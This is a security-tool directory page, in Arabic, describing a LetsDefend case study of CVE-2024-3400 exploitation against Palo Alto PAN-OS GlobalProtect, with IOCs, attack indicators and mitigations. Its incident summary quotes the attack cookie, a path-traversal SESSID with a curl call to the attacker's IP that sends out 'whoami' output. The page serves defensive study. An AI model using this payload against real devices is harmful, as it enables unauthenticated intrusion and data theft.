Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
letsdefend-cve2024-3400-case-study — استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect الخاصة بـ Palo Alto PAN-OS. تتضمن مؤشرات الاختراق (IOCs)، وأنماط الاستغلال، وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتحقيق الجنائي الرقميالتحاليل الرقمية الجنائيةالقيادة والسيطرةاستخبارات التهديداتالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الاستجابة للحوادث
تحليل السجلات
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect الخاصة بـ Palo Alto PAN-OS. تتضمن مؤشرات الاختراق (IOCs)، وأنماط الاستغلال، وإرشادات التخفيف.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

letsdefend-cve2024-3400-case-study

استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect في Palo Alto PAN-OS. يتضمن مؤشرات الاختراق (IOCs) وأنماط الاستغلال وإرشادات التخفيف.

التحقيق في حادثة CVE-2024-3400

🔍 نظرة عامة

يحتوي هذا المستودع على تحقيق مفصل وتحليل تهديدات لـ CVE-2024-3400، وهي ثغرة حرجة في حقن الأوامر بدون مصادقة تؤثر على برنامج Palo Alto Networks PAN-OS، وتستهدف تحديدًا بوابة GlobalProtect.

في 18 أبريل 2024، تم اكتشاف نشاط استغلال ضد جدار حماية PAN-OS داخلي عبر نقطة النهاية الضعيفة /global-protect/login.esp. استخدم المهاجم ملف تعريف ارتباط SESSID معدًا يحتوي على أمر curl يتم تنفيذه عبر علامة backtick للوصول إلى خادم C2 بعيد مستضاف على 144.172.79.92 (ميامي، فلوريدا). استغلت الحمولة الضارة ${IFS} لتجاوز عوامل التصفية البسيطة واستخدمت دليل القياس عن بُعد (telemetry) في PAN-OS لترتيب النشاط الضار. استجاب جدار الحماية برمز 200 OK، مما يشير إلى أن الحمولة نُفذت بنجاح على الأرجح.

نظرة عامة على الحادثة

📄 ملخص الحادثة

  • معرّف الحدث: 249

  • قاعدة الكشف: SOC274 – استغلال حقن الأوامر في PAN-OS

  • وقت الحدث: 18 أبريل 2024، الساعة 03:09 صباحًا بالتوقيت العالمي المنسق (UTC)

  • اسم المضيف: PA-Firewall-01

  • عنوان IP الوجهة: 172.16.17.139

  • عنوان IP المصدر: 144.172.79.92

  • طريقة الطلب: POST

  • نقطة النهاية: /global-protect/login.esp

  • حمولة ملف تعريف الارتباط: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • التجزئات الضارة:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • : (تم تنفيذه باستخدام )

🧠 استخبارات التهديدات

استخبارات التهديدات

الخطوة 1: الكشف الأولي عن الاستغلال بالبحث في Malpedia

الخطوة 1 من التحقيق

الخطوة 2: تحليل التجزئة والتحقيق فيها

الخطوة 2 من التحقيق

الخطوة 3: تحقيق إضافي

الخطوة 3 من التحقيق

الخطوة 4: التحقيق في عنوان IP

الخطوة 4 من التحقيق

🧠 المؤشرات السلوكية

  • إساءة استخدام SESSID لحقن الأوامر
  • استخدام ${IFS} للمراوغة
  • ترتيب الحمولة في /opt/panlogs/tmp/device_telemetry
  • تورط عملية dt_send بعد الاستغلال
  • استدعاء شبكة عكسي إلى عنوان IP الخاص بالمهاجم على المنفذ 4444

📄 أدلة السجلات

نموذج من السجلات


🧩 ارتباط التجزئات

تطابق التجزئة


✅ النقاط المكتسبة في LetsDefend

النقاط الرئيسية

🚨 التأثير

  • تنفيذ أوامر عن بُعد بدون مصادقة على جهاز أمني أساسي
  • احتمال تنزيل وتنفيذ حمولة Python يتحكم بها المهاجم
  • إساءة استخدام آليات القياس عن بُعد الداخلية في PAN-OS للترتيب أو استخراج البيانات
  • السماح بحركة مرور من عنوان IP ضار معروف

✅ إجراءات الاستجابة الموصى بها

  1. تحديث PAN-OS إلى الإصدارات: 10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3
  2. حظر عنوان IP الضار: 144.172.79.92
  3. البحث عن مؤشرات الاختراق (IOCs) في السجلات وأنظمة الملفات
  4. فحص أدلة القياس عن بُعد بحثًا عن ملفات مشبوهة أو سلوك تنفيذ
  5. عزل الأنظمة المتأثرة وإجراء تحليل جنائي كامل

📁 المحتويات

  • logs/: سجلات الكشف الأولية والمحللة
  • ioc/: تجزئات الملفات وعناوين IP المرتبطة بالهجوم
  • analysis/: تعمق في سلوك الاستغلال وتتبع العمليات
  • report/: ملخص وصور للسجلات والأكواد من تحقيقاتي

ما هو CVE-2024-3400

يشير CVE-2024-3400 إلى ثغرة حرجة في Palo Alto Networks PAN-OS، وتؤثر تحديدًا على بوابات GlobalProtect. إليك تفصيل لما هو معروف علنًا عنها:

🔥 CVE-2024-3400 – ثغرة حقن الأوامر في Palo Alto PAN-OS

درجة CVSS: 10.0 (حرجة)

تاريخ النشر: أبريل 2024

المنتجات المتأثرة: PAN-OS 10.2 و11.0 و11.1 عند تفعيل GlobalProtect.

الاستغلال: مؤكد في البرية (يوم صفري)

نوع الثغرة: حقن أوامر بدون مصادقة

🧠 ما هو الخطر؟

تسمح CVE-2024-3400 للمهاجمين غير المصادقين بتنفيذ أوامر عشوائية على نظام تشغيل جدار الحماية. وهذا يمنحهم فعليًا سيطرة كاملة على الأجهزة المتأثرة دون الحاجة إلى بيانات اعتماد — وهي نقطة اختراق خطيرة لأي مؤسسة تعتمد على جدران حماية Palo Alto.

⚠️ الشروط المطلوبة للاستغلال:

يجب تفعيل بوابة GlobalProtect.

إصدارات محددة من PAN-OS (10.2.x، 11.0.x، 11.1.x).

قابلة للاستغلال عبر الإنترنت إذا لم تكن خلف طبقات حماية إضافية.

🔎 ما يفعله المهاجمون:

إرسال طلبات مصممة لاستغلال ثغرة الحقن.

نشر قذائف بعيدة أو تنزيل حمولات من المرحلة الثانية.

السلوك المرصود يشمل:

تنفيذ أوامر عبر عناوين URL مصممة

آليات استمرارية

تنقل جانبي داخل الشبكات

🛡️ التخفيف والتوصيات:

التحديث فورًا: أصدرت Palo Alto إصلاحات؛ قم بالترقية إلى الإصدارات غير المتأثرة (مثل 10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3 أو أحدث).

التحقق من مؤشرات الاختراق (IOCs) مثل العمليات المشبوهة أو الاتصالات الصادرة أو سجل أوامر CLI غير المعتاد.

استخدام أدوات مثل Shodan أو جرد الأصول للعثور على الأجهزة المعرضة للخطر.

🛠️ كيفية التحقيق (مثل عبر LetsDefend أو SIEM):

البحث عن عناوين IP خارجية تصل إلى GlobalProtect دون مصادقة صالحة.

التحقق من تنفيذ أوامر مشبوهة في السجلات (show system processes، cat /etc/passwd، وغيرها).

مراقبة سلوك جدار الحماية والتنبيه على الاتصالات الصادرة الشاذة.

يعمل هذا المستودع كتقرير تحقيق داخلي وكمورد تعليمي للمدافعين الراغبين في فهم الاستغلال الواقعي لثغرات PAN-OS. المساهمات والملاحظات الإضافية مرحب بها.

تنزيل الأداة
البرنامج النصي الضار
update.py
/usr/bin/python3